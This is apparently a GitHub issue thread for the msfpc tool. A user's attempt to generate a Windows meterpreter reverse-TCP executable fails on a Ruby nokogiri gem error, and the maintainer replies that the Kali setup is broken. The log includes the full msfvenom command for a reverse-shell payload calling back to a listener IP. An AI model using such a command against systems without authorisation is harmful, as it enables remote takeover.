### ISSUE TITLE
payload was unable to create

### ISSUE THREAD

**Issue by geekyneard** [g0tmi1k/mpc#10]
root@kali:/home/Downloads/msfpc# ./msfpc.sh windows 192.168.1.9
 [*] MSFvenom Payload Creator (MSFPC v1.4.5)
 [i]   IP: 192.168.1.9
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.5 LPORT=443 \
  > '/home/Downloads/msfpc/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] Something went wrong. Issue creating file =(.

----------------------------------------------------------------------------------------
Could not find nokogiri-1.10.8 in any of the sources
Run `bundle install` to install missing gems.
Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux
----------------------------------------------------------------------------------------
/usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/spec_set.rb:86:in `block in materialize': Could not find nokogiri-1.10.8 in any of the sources (Bundler::GemNotFound)
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/spec_set.rb:80:in `map!'
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/spec_set.rb:80:in `materialize'
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/definition.rb:170:in `specs'
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/definition.rb:237:in `specs_for'
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/definition.rb:226:in `requested_specs'
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/runtime.rb:101:in `block in definition_method'
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/runtime.rb:20:in `setup'
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler.rb:149:in `setup'
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/setup.rb:20:in `block in <top (required)>'
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/ui/shell.rb:136:in `with_level'
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/ui/shell.rb:88:in `silence'
	from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/setup.rb:20:in `<top (required)>'
	from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require'
	from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require'
	from /usr/share/metasploit-framework/config/boot.rb:28:in `<top (required)>'
	from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require'
	from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require'
	from /usr/share/metasploit-framework/lib/msfenv.rb:12:in `<top (required)>'
	from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:72:in `require'
	from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:72:in `require'
	from /usr/bin/msfvenom:18:in `require_deps'
	from /usr/bin/msfvenom:36:in `init_framework'
	from /usr/bin/msfvenom:55:in `framework'
	from /usr/bin/msfvenom:446:in `<main>'
----------------------------------------------------------------------------------------

i have installed nokogiri-1.10.8 still showing same error.
i am using Kali Linux 2019.3 amd64

Thank You

**Comment by g0tmi1k** [comment]
Looks like you have broken your Kali by installing things incorrectly
